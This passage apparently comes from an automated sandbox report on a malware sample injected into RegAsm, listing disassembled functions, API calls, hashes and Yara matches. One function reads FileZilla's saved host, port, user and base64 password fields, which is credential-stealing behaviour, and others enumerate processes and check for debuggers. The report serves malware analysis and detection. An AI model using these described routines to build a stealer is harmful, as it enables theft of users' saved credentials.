                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 1FC136AB
                                                    • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040), ref: 1FC136F3
                                                    • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 1FC1370E
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID: Locale$InfoValid$CodeDefaultPageUser
                                                    • String ID:
                                                    • API String ID: 3475089800-0
                                                    • Opcode ID: 9e27f4d2e78b9922c53b1e56cabc765231966745f237afc57087c3c9140e9a1c
                                                    • Instruction ID: 73016c1f4bcc037d73c6e80afde5f095d9ed6cd87135849951a3ce3e1026e115
                                                    • Opcode Fuzzy Hash: 9e27f4d2e78b9922c53b1e56cabc765231966745f237afc57087c3c9140e9a1c
                                                    • Instruction Fuzzy Hash: ED5181B6A04205DBEF00DFA5CC80AEE77B8BF04714F514569E505EF240EB75A564FB60
                                                    Function 004137BD Relevance: 7.6, APIs: 5, Instructions: 55processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004137F8
                                                    • Process32First.KERNEL32(00000000,00000128), ref: 0041380B
                                                    • Process32Next.KERNEL32(00000000,00000128), ref: 0041381F
                                                    • StrCmpCA.SHLWAPI(?,0041136D), ref: 00413833
                                                    • CloseHandle.KERNEL32(00000000), ref: 00413850
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                    • String ID:
                                                    • API String ID: 420147892-0
                                                    • Opcode ID: e2cf7e779634c82798d1ab7fc4ecbbe8b45b50fd72aeb002bd9fe8f8be4b5c7f
                                                    • Instruction ID: 3056cab4e8f92392e2f21ee4b583b1a296e2112487504496f7e9dd1b11d1fd51
                                                    • Opcode Fuzzy Hash: e2cf7e779634c82798d1ab7fc4ecbbe8b45b50fd72aeb002bd9fe8f8be4b5c7f
                                                    • Instruction Fuzzy Hash: 50116D75A00219EFDB11DF95CC49BEEBBF8FB05751F10426AF505A22A0D7349B80CBA5
                                                    Function 1FA22C8E Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 1FBC48A7
                                                    • IsDebuggerPresent.KERNEL32 ref: 1FBC4973
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 1FBC4993
                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 1FBC499D
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                    • String ID:
                                                    • API String ID: 254469556-0
                                                    • Opcode ID: ad2f19eb3bb0fa4f7d4bba86a357567e678c51ca99c1e52faad8409d99c5e144
                                                    • Instruction ID: 9e338ddf203bb5de2c00f16f2351c8f15fba8097a37c29626a43bba76e58c4c9
                                                    • Opcode Fuzzy Hash: ad2f19eb3bb0fa4f7d4bba86a357567e678c51ca99c1e52faad8409d99c5e144
                                                    • Instruction Fuzzy Hash: D4312675D05329DBDB20DFA5D9897CDBBF8EF08700F1041EAE508AB240EB799A859F05
                                                    Function 1FA7EF30 Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bf41f3b5669224c1154e9b2a92fe1b82126ef762f8275621b626f57154db146f
                                                    • Instruction ID: 9a6db0e7bfc843b2a074a4be52e26480c3007121c6845a363f1912d8476b8811
                                                    • Opcode Fuzzy Hash: bf41f3b5669224c1154e9b2a92fe1b82126ef762f8275621b626f57154db146f
                                                    • Instruction Fuzzy Hash: 561108319046926BD3128B28D980F46F7E4BF44324F054764FD499BE50DB2EF860C7E1
                                                    Function 0041302D Relevance: 6.0, APIs: 4, Instructions: 48encryptionCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CryptBinaryToStringA.CRYPT32(00000000,00404E7F,40000001,00000000,00000000), ref: 0041304A
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: BinaryCryptString
                                                    • String ID:
                                                    • API String ID: 80407269-0
                                                    • Opcode ID: 0c3d2575f66ef3617d3b150568e86f21a4475e45e20c070a860bd0a5cc44e0b9
                                                    • Instruction ID: ebb07d4d2038599017bd7936e312b347f00f81c902c408717c114f30d6bde88e
                                                    • Opcode Fuzzy Hash: 0c3d2575f66ef3617d3b150568e86f21a4475e45e20c070a860bd0a5cc44e0b9
                                                    • Instruction Fuzzy Hash: 0B110235100208FFCF019FA0EC44BEA3FE6BF4A346F005055FA198B261C73A9AE5AB15
                                                    Function 00407DC2 Relevance: 6.0, APIs: 4, Instructions: 47encryptionmemoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00406095,00000000,00000000), ref: 00407DE6
                                                    • LocalAlloc.KERNEL32(00000040,00406095,?,?,00406095,00000000,?), ref: 00407DF7
                                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00406095,00000000,00000000), ref: 00407E1D
                                                    • LocalFree.KERNEL32(00000000,?,?,00406095,00000000,?), ref: 00407E31
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: BinaryCryptLocalString$AllocFree
                                                    • String ID:
                                                    • API String ID: 4291131564-0
                                                    • Opcode ID: deeba232d106885c0454fdd3198b08a4c0ba8fabd56afdf74056047371364842
                                                    • Instruction ID: e33ba69c3b6969ce421dee6c4dd1793123054a3d25ccc2b6f752ca442289a633
                                                    • Opcode Fuzzy Hash: deeba232d106885c0454fdd3198b08a4c0ba8fabd56afdf74056047371364842
                                                    • Instruction Fuzzy Hash: 35117234641308FFEB118F54CC46B993BB2FB06755F208094FA15AF2E0C7B5AA50DB58
                                                    Function 1FB037E0 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 163b20eed04c21f543b465dbf508e26d1b36e382aec2e71a79acdea727c2a907
                                                    • Instruction ID: 560406bc605b98043f4d3828283b40f67451d2464bc99328c94e989a8e204fe7
                                                    • Opcode Fuzzy Hash: 163b20eed04c21f543b465dbf508e26d1b36e382aec2e71a79acdea727c2a907
                                                    • Instruction Fuzzy Hash: 2CE0B63E104780ABCB225F55DE45E4BBFF6AF48314F440C18F68561470C7BAB8A6AB41
                                                    Function 1FAE3770 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f4ccdf9b743d75f8252b2851f4553c50142fb9d6052622b86404dbf4ff0d5e94
                                                    • Instruction ID: fb6e51a71fe1cb106fe8528747596a7cc459c0afc32ce97d9bc3825f68c3b174
                                                    • Opcode Fuzzy Hash: f4ccdf9b743d75f8252b2851f4553c50142fb9d6052622b86404dbf4ff0d5e94
                                                    • Instruction Fuzzy Hash: A0E0923A104700ABCB225B54DE46E4ABBF6BF48710F440C18F6C521670C66AB864AB41
                                                    Function 1FAC5910 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • INSERT INTO '%q'.'%q_idx'(segid,term,pgno) VALUES(?,?,?), xrefs: 1FAC597E
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: INSERT INTO '%q'.'%q_idx'(segid,term,pgno) VALUES(?,?,?)
                                                    • API String ID: 0-143322027
                                                    • Opcode ID: 8abcb6dbc0fb92b427cb66736e87cf2d4ee5ea06ba9e675eba8b6c3e490a233a
                                                    • Instruction ID: 7e66fd106486576141f37729c65a119fd74b6270c53d803540ffa34e91554099
                                                    • Opcode Fuzzy Hash: 8abcb6dbc0fb92b427cb66736e87cf2d4ee5ea06ba9e675eba8b6c3e490a233a
                                                    • Instruction Fuzzy Hash: 911159BA500206BFE7109F55CC84F86BBEDFF45314F504545F9489B291C3BAB5A4CBA0
                                                    Function 1FADD3B0 Relevance: 4.6, APIs: 3, Instructions: 119COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bbb395fe19e3703a864b3c6bbd0c73fddc885aa75aee0ccce463c370a687b510
                                                    • Instruction ID: 3cffc9f5d04703d53f3d917cf592ffec2282c238b496c8f1a3800524913d6164
                                                    • Opcode Fuzzy Hash: bbb395fe19e3703a864b3c6bbd0c73fddc885aa75aee0ccce463c370a687b510
                                                    • Instruction Fuzzy Hash: 753148B4704305ABE700DF69EC84AA6B3E9FF48324F048568F949C7241E77AF911CBA1
                                                    Function 1FAC55B0 Relevance: 4.6, APIs: 3, Instructions: 106COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 85c9efe1c0bfe5f1fc925be416f83e75e669483736544c25bc3d0315e2988ecf
                                                    • Instruction ID: 0abe1bee7a0bff27a86ab39eaa5267c822bc3eef0df4b19d17e9d0d184899c66
                                                    • Opcode Fuzzy Hash: 85c9efe1c0bfe5f1fc925be416f83e75e669483736544c25bc3d0315e2988ecf
                                                    • Instruction Fuzzy Hash: BF319AB5600301AFEB108F29DC84B5777E9EF84354F144868F9868B251E779F850CF61
                                                    Function 0040F4EC Relevance: 72.1, APIs: 31, Strings: 10, Instructions: 328stringmemoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                      • Part of subcall function 00412F92: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00412FBC
                                                      • Part of subcall function 004117E0: lstrcpyA.KERNEL32(00000000,00000000), ref: 0041182C
                                                      • Part of subcall function 004117E0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041183A
                                                      • Part of subcall function 0041177A: lstrcpyA.KERNEL32(00000000,?,?,?,0041A98C,00000000,?,?,00428E5C,?,00000000), ref: 004117D3
                                                      • Part of subcall function 0041185B: lstrlenA.KERNEL32(00428E5C,?,00428E5C,?,00000000), ref: 0041186F
                                                      • Part of subcall function 0041185B: lstrcpyA.KERNEL32(00000000,?), ref: 004118A8
                                                      • Part of subcall function 0041185B: lstrcatA.KERNEL32(00000000,00000000), ref: 004118B4
                                                      • Part of subcall function 004116B4: lstrcpyA.KERNEL32(?,?,?,?,004118C6,00000000), ref: 004116F4
                                                      • Part of subcall function 00407CDF: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00407D05
                                                      • Part of subcall function 00407CDF: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00407D29
                                                      • Part of subcall function 00407CDF: LocalAlloc.KERNEL32(00000040,?), ref: 00407D48
                                                      • Part of subcall function 00407CDF: ReadFile.KERNEL32(000000FF,00000000,?,0040F582,00000000), ref: 00407D6E
                                                      • Part of subcall function 00407CDF: LocalFree.KERNEL32(00000000), ref: 00407DA0
                                                      • Part of subcall function 00407CDF: CloseHandle.KERNEL32(000000FF), ref: 00407DA9
                                                      • Part of subcall function 00412FD6: LocalAlloc.KERNEL32(00000040,00000001), ref: 00412FF2
                                                    • strtok_s.MSVCRT ref: 0040F5B2
                                                    • GetProcessHeap.KERNEL32(00000000,000F423F,00425200,00425200,00425200,00425200), ref: 0040F5F8
                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040F5FF
                                                    • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040F61A
                                                    • lstrlenA.KERNEL32(00000000), ref: 0040F627
                                                      • Part of subcall function 004136CE: malloc.MSVCRT ref: 004136D5
                                                      • Part of subcall function 004136CE: strncpy.MSVCRT ref: 004136EB
                                                    • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040F661
                                                    • lstrlenA.KERNEL32(00000000), ref: 0040F66E
                                                    • StrStrA.SHLWAPI(00000000,<User>), ref: 0040F6A8
                                                    • lstrlenA.KERNEL32(00000000), ref: 0040F6B5
                                                    • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040F6EF
                                                    • lstrlenA.KERNEL32(00000000), ref: 0040F700
                                                    • lstrlenA.KERNEL32(00000000), ref: 0040F78B
                                                    • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0040F7A3
                                                    • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0040F7BB
                                                    • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0040F7D3
                                                    • lstrcatA.KERNEL32(?,Soft: FileZilla,?,?,00000000), ref: 0040F7EA
                                                    • lstrcatA.KERNEL32(?,Host: ,?,?,00000000), ref: 0040F7F8
